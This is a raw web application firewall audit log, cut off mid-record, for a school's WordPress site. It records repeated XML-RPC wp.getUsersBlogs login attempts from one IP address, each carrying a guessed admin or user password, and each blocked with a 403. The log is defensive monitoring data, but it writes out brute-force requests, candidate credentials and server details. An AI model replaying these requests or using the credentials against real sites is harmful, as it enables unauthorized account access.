"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511717977936 5222 (- - -) Stopwatch2: 1745511717977936 5222; combined=4013, p1=560, p2=3242, p3=0, p4=0, p5=121, sr=203, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e3bb613-Z-- --9a5b5f03-A-- [24/Apr/2025:23:22:57 +0700] aAplYWLuk3f9kLjsdTZlbgAAAIk 103.236.140.4 36136 103.236.140.4 8181 --9a5b5f03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9a5b5f03-C-- wp.getUsersBlogs admin Marketing2012 --9a5b5f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a5b5f03-E-- --9a5b5f03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511777313223 4903 (- - -) Stopwatch2: 1745511777313223 4903; combined=3338, p1=396, p2=2779, p3=0, p4=0, p5=94, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a5b5f03-Z-- --d6e70608-A-- [24/Apr/2025:23:23:57 +0700] aAplnd5yz20UX9VrdZOrbAAAAFI 103.236.140.4 40188 103.236.140.4 8181 --d6e70608-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6e70608-C-- wp.getUsersBlogs admin smkn22-jkt.sch000 --d6e70608-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6e70608-E-- --d6e70608-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511837195333 5006 (- - -) Stopwatch2: 1745511837195333 5006; combined=3512, p1=414, p2=2929, p3=0, p4=0, p5=98, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6e70608-Z-- --48f6d934-A-- [24/Apr/2025:23:24:57 +0700] aApl2clQo524fhbIj1xoMAAAABA 103.236.140.4 43822 103.236.140.4 8181 --48f6d934-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48f6d934-C-- wp.getUsersBlogs admin Adminadmin --48f6d934-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f6d934-E-- --48f6d934-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511897621672 4715 (- - -) Stopwatch2: 1745511897621672 4715; combined=3246, p1=399, p2=2692, p3=0, p4=0, p5=90, sr=81, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f6d934-Z-- --a14fd039-A-- [24/Apr/2025:23:25:57 +0700] aApmFclQo524fhbIj1xo9gAAABU 103.236.140.4 47668 103.236.140.4 8181 --a14fd039-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a14fd039-C-- wp.getUsersBlogs admin zaq1xsw2 --a14fd039-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a14fd039-E-- --a14fd039-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511957321312 5336 (- - -) Stopwatch2: 1745511957321312 5336; combined=3794, p1=448, p2=3097, p3=0, p4=0, p5=145, sr=87, sw=104, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a14fd039-Z-- --d78d8e17-A-- [24/Apr/2025:23:27:01 +0700] aApmVd5yz20UX9VrdZOuEQAAAEw 103.236.140.4 51794 103.236.140.4 8181 --d78d8e17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d78d8e17-C-- wp.getUsersBlogs admin 112233 --d78d8e17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d78d8e17-E-- --d78d8e17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512021075750 4969 (- - -) Stopwatch2: 1745512021075750 4969; combined=3782, p1=431, p2=3151, p3=0, p4=0, p5=117, sr=89, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d78d8e17-Z-- --e58e462b-A-- [24/Apr/2025:23:28:01 +0700] aApmkclQo524fhbIj1xrTAAAAA0 103.236.140.4 55704 103.236.140.4 8181 --e58e462b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e58e462b-C-- wp.getUsersBlogs admin 123312 --e58e462b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e58e462b-E-- --e58e462b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512081078488 5470 (- - -) Stopwatch2: 1745512081078488 5470; combined=4069, p1=459, p2=3417, p3=0, p4=0, p5=111, sr=100, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e58e462b-Z-- --69063d7a-A-- [24/Apr/2025:23:29:01 +0700] aApmzWLuk3f9kLjsdTZrcgAAAIY 103.236.140.4 59600 103.236.140.4 8181 --69063d7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69063d7a-C-- wp.getUsersBlogs admin administrators --69063d7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69063d7a-E-- --69063d7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512141368477 4553 (- - -) Stopwatch2: 1745512141368477 4553; combined=3369, p1=447, p2=2763, p3=0, p4=0, p5=94, sr=91, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69063d7a-Z-- --103b3722-A-- [24/Apr/2025:23:29:55 +0700] aApnA95yz20UX9VrdZOwowAAAFA 103.236.140.4 34564 103.236.140.4 8181 --103b3722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --103b3722-C-- wp.getUsersBlogs admin 1234%^&* --103b3722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --103b3722-E-- --103b3722-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512195394899 4025 (- - -) Stopwatch2: 1745512195394899 4025; combined=2791, p1=364, p2=2299, p3=0, p4=0, p5=78, sr=69, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --103b3722-Z-- --5f86b977-A-- [24/Apr/2025:23:30:01 +0700] aApnCclQo524fhbIj1xtRAAAAAQ 103.236.140.4 34916 103.236.140.4 8181 --5f86b977-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5f86b977-C-- wp.getUsersBlogs admin 1235698 --5f86b977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f86b977-E-- --5f86b977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512201328626 6617 (- - -) Stopwatch2: 1745512201328626 6617; combined=4778, p1=626, p2=3980, p3=0, p4=0, p5=99, sr=119, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f86b977-Z-- --f0c70441-A-- [24/Apr/2025:23:31:01 +0700] aApnRd5yz20UX9VrdZOyeQAAAEc 103.236.140.4 38876 103.236.140.4 8181 --f0c70441-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f0c70441-C-- wp.getUsersBlogs admin fitness --f0c70441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0c70441-E-- --f0c70441-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (94+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512261671526 5602 (- - -) Stopwatch2: 1745512261671526 5602; combined=3931, p1=437, p2=3295, p3=0, p4=0, p5=116, sr=86, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0c70441-Z-- --43b0493f-A-- [24/Apr/2025:23:32:02 +0700] aApngd5yz20UX9VrdZOzTwAAAFM 103.236.140.4 42746 103.236.140.4 8181 --43b0493f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --43b0493f-C-- wp.getUsersBlogs admin killer --43b0493f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43b0493f-E-- --43b0493f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512321994083 18027 (- - -) Stopwatch2: 1745512321994083 18027; combined=28413, p1=540, p2=3539, p3=0, p4=0, p5=12184, sr=91, sw=80, l=0, gc=12070 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b0493f-Z-- --930d3f02-A-- [24/Apr/2025:23:33:08 +0700] aApnxN5yz20UX9VrdZO0sgAAAFU 103.236.140.4 47048 103.236.140.4 8181 --930d3f02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --930d3f02-C-- wp.getUsersBlogs admin rebecca --930d3f02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --930d3f02-E-- --930d3f02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512388828002 6397 (- - -) Stopwatch2: 1745512388828002 6397; combined=4459, p1=545, p2=3734, p3=0, p4=0, p5=104, sr=92, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --930d3f02-Z-- --ab633f0c-A-- [24/Apr/2025:23:34:08 +0700] aApoAN5yz20UX9VrdZO1bwAAAEQ 103.236.140.4 50858 103.236.140.4 8181 --ab633f0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ab633f0c-C-- wp.getUsersBlogs admin simpsons --ab633f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab633f0c-E-- --ab633f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512448322813 5205 (- - -) Stopwatch2: 1745512448322813 5205; combined=3726, p1=457, p2=3091, p3=0, p4=0, p5=104, sr=87, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab633f0c-Z-- --9591ad62-A-- [24/Apr/2025:23:35:08 +0700] aApoPN5yz20UX9VrdZO2TQAAAFI 103.236.140.4 54276 103.236.140.4 8181 --9591ad62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9591ad62-C-- wp.getUsersBlogs wakakur r007p455w0rd --9591ad62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9591ad62-E-- --9591ad62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512508183649 5574 (- - -) Stopwatch2: 1745512508183649 5574; combined=3998, p1=448, p2=3353, p3=0, p4=0, p5=113, sr=94, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9591ad62-Z-- --7e0fd018-A-- [24/Apr/2025:23:36:08 +0700] aApoePiVYlyO1xhz7yOd4QAAANE 103.236.140.4 58012 103.236.140.4 8181 --7e0fd018-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7e0fd018-C-- wp.getUsersBlogs wakakur wakakur1990 --7e0fd018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e0fd018-E-- --7e0fd018-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512568025675 5861 (- - -) Stopwatch2: 1745512568025675 5861; combined=4134, p1=527, p2=3392, p3=0, p4=0, p5=126, sr=91, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e0fd018-Z-- --3be4200c-A-- [24/Apr/2025:23:37:08 +0700] aApotGLuk3f9kLjsdTZzFgAAAI8 103.236.140.4 33456 103.236.140.4 8181 --3be4200c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 